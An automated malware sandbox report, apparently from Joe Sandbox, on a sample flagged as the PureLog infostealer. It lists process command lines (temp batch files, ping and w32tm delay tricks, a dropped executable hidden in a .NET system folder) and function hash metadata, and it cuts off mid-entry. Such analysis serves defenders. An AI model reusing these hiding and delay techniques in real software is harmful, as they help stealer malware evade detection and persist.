Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs Detection: 62%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	21:22:24
Start date:	27/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\77a9gOcAJB.bat"
Imagebase:	0x7ff7174c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	21:22:24
Start date:	27/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	21:22:25
Start date:	27/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6274e0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	21:22:25
Start date:	27/09/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff6dd990000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	21:22:34
Start date:	27/09/2024
Path:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Imagebase:	0x7a0000
File size:	1'912'832 bytes
MD5 hash:	330A09824E901F7C2FB65BE086DF1493
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	21:22:38
Start date:	27/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tOMWzubzd4.bat"
Imagebase:	0x7ff7174c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	21:22:38
Start date:	27/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	21:22:38
Start date:	27/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6274e0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	21:22:38
Start date:	27/09/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7ede40000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	21:22:43
Start date:	27/09/2024
Path:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Imagebase:	0x800000
File size:	1'912'832 bytes
MD5 hash:	330A09824E901F7C2FB65BE086DF1493
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	21:22:45
Start date:	27/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6C8kMSA4ag.bat"
Imagebase:	0x7ff7174c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	21:22:45
Start date:	27/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	21:22:46
Start date:	27/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6274e0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	21:22:46
Start date:	27/09/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff6dd990000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	21:22:55
Start date:	27/09/2024
Path:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Imagebase:	0x870000
File size:	1'912'832 bytes
MD5 hash:	330A09824E901F7C2FB65BE086DF1493
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	21:22:58
Start date:	27/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\mzBmoeLRKc.bat"
Imagebase:	0x7ff7174c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	21:22:58
Start date:	27/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	21:22:58
Start date:	27/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6274e0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	21:22:58
Start date:	27/09/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7ede40000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	21:23:03
Start date:	27/09/2024
Path:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Imagebase:	0xda0000
File size:	1'912'832 bytes
MD5 hash:	330A09824E901F7C2FB65BE086DF1493
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	21:23:06
Start date:	27/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\F0qtrCuOKA.bat"
Imagebase:	0x7ff7174c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	21:23:07
Start date:	27/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	21:23:07
Start date:	27/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6274e0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	21:23:07
Start date:	27/09/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7ede40000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	21:23:12
Start date:	27/09/2024
Path:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Imagebase:	0x70000
File size:	1'912'832 bytes
MD5 hash:	330A09824E901F7C2FB65BE086DF1493
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	21:23:14
Start date:	27/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uw07fWAZe6.bat"
Imagebase:	0x7ff7174c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	21:23:14
Start date:	27/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	21:23:14
Start date:	27/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6274e0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	21:23:14
Start date:	27/09/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7ede40000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	21:23:20
Start date:	27/09/2024
Path:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Imagebase:	0x870000
File size:	1'912'832 bytes
MD5 hash:	330A09824E901F7C2FB65BE086DF1493
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	21:23:22
Start date:	27/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9VsmEYMPZS.bat"
Imagebase:	0x7ff7174c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	21:23:22
Start date:	27/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	21:23:22
Start date:	27/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6274e0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	21:23:22
Start date:	27/09/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7ede40000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	21:23:27
Start date:	27/09/2024
Path:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Imagebase:	0xaa0000
File size:	1'912'832 bytes
MD5 hash:	330A09824E901F7C2FB65BE086DF1493
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	21:23:50
Start date:	27/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\mpHYiEZ4vY.bat"
Imagebase:	0x7ff7174c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	21:23:50
Start date:	27/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	21:23:50
Start date:	27/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6274e0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	21:23:51
Start date:	27/09/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff6dd990000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	21:24:00
Start date:	27/09/2024
Path:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Imagebase:	0x7f0000
File size:	1'912'832 bytes
MD5 hash:	330A09824E901F7C2FB65BE086DF1493
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	21:24:12
Start date:	27/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat"
Imagebase:	0x7ff7174c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	53
Start time:	21:24:12
Start date:	27/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	54
Start time:	21:24:13
Start date:	27/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6274e0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	21:24:13
Start date:	27/09/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7ede40000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	6.6%
Dynamic/Decrypted Code Coverage:	10%
Signature Coverage:	0%
Total number of Nodes:	10
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFB4B3F0D48 Relevance: 1.5, Strings: 1, Instructions: 262
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5Z_H, xrefs: 00007FFB4B3F0DF3

Memory Dump Source

Source File: 00000000.00000002.1538146084.00007FFB4B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4b3f0000_yQrCGtNgsf.jbxd

Similarity

API ID:
String ID: 5Z_H
API String ID: 0-3267294416
Opcode ID: bf1cd3b9d5262914547a926595aaff7ca3b38e0597f07a77ce1f6b056fd4c635
Instruction ID: 4f7c7302e8ee9354dc63e055b7a70bf624f145583c7efd23d5aacf0aa2f23d9d
Opcode Fuzzy Hash: bf1cd3b9d5262914547a926595aaff7ca3b38e0597f07a77ce1f6b056fd4c635
Instruction Fuzzy Hash: 6C91E1B1A1CA898FE78ADF7CC8697A97FE1FB56310F1400BAD249C76E2CA781411C751

Function 00007FFB4B7E7FAD Relevance: 1.8, APIs: 1, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1540439047.00007FFB4B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4b7e0000_yQrCGtNgsf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acc8c838503767366c947bd7b06879d23b61db336b4fc84c247da444cc727164
Instruction ID: 2dd581b8ae68c2a373c94b462803ccd0aec0eb3e9834938cea68c5fd42eed2b7
Opcode Fuzzy Hash: acc8c838503767366c947bd7b06879d23b61db336b4fc84c247da444cc727164
Instruction Fuzzy Hash: D791F4715096488FDB69EF28D8467F937E1FF69311F04827EE84EC72A2CA34A845C785

Function 00007FFB4B7E7FF8 Relevance: 1.8, APIs: 1, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1540439047.00007FFB4B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4b7e0000_yQrCGtNgsf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ed4c0d257d3fee729027fd87f932b21b423cdd40c0e055e9a58f96f85a8168d
Instruction ID: 5d713d87011e03e6d1f89ea96357e24d09700c54100d937bfa47b3bfba034144
Opcode Fuzzy Hash: 1ed4c0d257d3fee729027fd87f932b21b423cdd40c0e055e9a58f96f85a8168d
Instruction Fuzzy Hash: D9819071508A4C8FDB69EF28D8457F937D1FF69311F10827EE84EC72A2CA34A8418B85

Function 00007FFB4B7E9C21 Relevance: 1.8, APIs: 1, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1540439047.00007FFB4B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4b7e0000_yQrCGtNgsf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2285f3ad724abc03e3c93d5b60a41582a75d8b98247dd747e322638433049379
Instruction ID: 5dc17d9f0a9fb5f58dd987b1ac3f6715e5ef6f68f7a9034f6baac5699e209045
Opcode Fuzzy Hash: 2285f3ad724abc03e3c93d5b60a41582a75d8b98247dd747e322638433049379
Instruction Fuzzy Hash: 8C718271508A4C8FDB69EF28D8557F537D1FF69311F10827EE84EC72A2CA74A8458B82

Function 00007FFB4B3F08D0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1538146084.00007FFB4B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4b3f0000_yQrCGtNgsf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 444f67084ea16de8482f8d2d19e1cc4a0c4dd6feb6d4f47827496445473e093e
Instruction ID: 7a08a6e75deec0f6f950c8562267d452c437a57c045bc66094e64fcb9cefbe14
Opcode Fuzzy Hash: 444f67084ea16de8482f8d2d19e1cc4a0c4dd6feb6d4f47827496445473e093e
Instruction Fuzzy Hash: 7C416B92A0E6554EE705BB7CE0A62F97B91DF49320B1844FFD58EC71E3DD1868828294

Function 00007FFB4B3F162D Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1538146084.00007FFB4B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4b3f0000_yQrCGtNgsf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d974fedd6326dbdda2caff6a14314fd4e31fd9349909f25a589d13a040010841
Instruction ID: 5df801e29db248b835c78f5fdfb0a7d7644074a70712b0fc39601beba443dae0
Opcode Fuzzy Hash: d974fedd6326dbdda2caff6a14314fd4e31fd9349909f25a589d13a040010841
Instruction Fuzzy Hash: 62315BA190DA955FF316BB78D8595F93BA1EF42320F0842F2D4888B1E3DD1C6D468391

Function 00007FFB4B3F0908 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1538146084.00007FFB4B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4b3f0000_yQrCGtNgsf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d975e54ddf56c4ed6d77574ef25d66f30d0292d3e2aac47c17cdb05bac5d84e
Instruction ID: 4df1f3fe7aeb59f10c56719e42046846142e3ccd78118121d528bf0c0e2e6ef6
Opcode Fuzzy Hash: 6d975e54ddf56c4ed6d77574ef25d66f30d0292d3e2aac47c17cdb05bac5d84e
Instruction Fuzzy Hash: 0D210A3170CC184FD768EA1CE889DB973D1EF9932130105BAE58EC7135E911EC8287C1

Function 00007FFB4B3F0960 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1538146084.00007FFB4B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4b3f0000_yQrCGtNgsf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92479d8a73aad02a112383afcfa58e43f4900ed93c732f2db16cc762f743cc3a
Instruction ID: 266e5fddcc94cf973be106d2d8badb3cc355c0b046c53fca40c941cd29d36a46
Opcode Fuzzy Hash: 92479d8a73aad02a112383afcfa58e43f4900ed93c732f2db16cc762f743cc3a
Instruction Fuzzy Hash: 2D3157A1B0E91A1FE704BA78E46A6B877C6DF49321F1440FED90EC31E3DD1C6C828294

Function 00007FFB4B3F0998 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1538146084.00007FFB4B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4b3f0000_yQrCGtNgsf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ae0c6468433b2f24ea1159d7182d4585a624b6f25368a0a1c4e2b58b7a4bd1a
Instruction ID: f15332aac333a801d83ebca70545e93beb19fcc1fd1a955e0b66191e9105d81e
Opcode Fuzzy Hash: 1ae0c6468433b2f24ea1159d7182d4585a624b6f25368a0a1c4e2b58b7a4bd1a
Instruction Fuzzy Hash: FD2126A0B1D95A0FEB49BB3CD46A67977C6DB99311F1400FDE94DC32E3DD28AC818245

Function 00007FFB4B3F116D Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1538146084.00007FFB4B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4b3f0000_yQrCGtNgsf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09e18449d04f468495a7319e16e260ddd615a9b48ce9839d00b145bf0e29e1d9
Instruction ID: 9e29daa490e2aebd12ebe061ebdbd64d04bd253409d82a2e0c39b5dcbd38781d
Opcode Fuzzy Hash: 09e18449d04f468495a7319e16e260ddd615a9b48ce9839d00b145bf0e29e1d9
Instruction Fuzzy Hash: 1431A27190CA498FDB45EF78C8589B97BE0FF56310B0445BAC00AD72A2DA29A945CB50

Function 00007FFB4B3F0C25 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1538146084.00007FFB4B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4b3f0000_yQrCGtNgsf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66e1e21add27530f7a30c9c1fc2d325cabb344f96974386d7e22576ace139c2f
